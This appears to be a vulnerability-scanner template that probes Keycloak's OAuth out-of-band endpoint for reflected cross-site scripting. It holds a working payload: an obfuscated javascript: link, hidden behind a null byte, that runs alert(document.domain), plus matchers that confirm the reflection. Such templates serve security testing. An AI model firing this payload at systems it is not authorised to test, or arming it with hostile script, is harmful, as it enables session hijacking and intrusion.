id: Keycloak-XSS

info:
  name: Keycloak xss 
  author: Excis3
  severity: Medium
  description: XSS Keycloak, possible 0-day
  tags: XSS

requests:
  - method: GET
    path:
      - "{{BaseURL}}/auth/realms/master/protocol/openid-connect/oauth/oob?error=%3Ca%20href=%22javascript%26%00colon;alert(document.domain)%22%3EReturn%20to%20application%3C/a%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "javascript&colon;alert%28document.domain%29"
          
      - type: status
        status:
          - 200
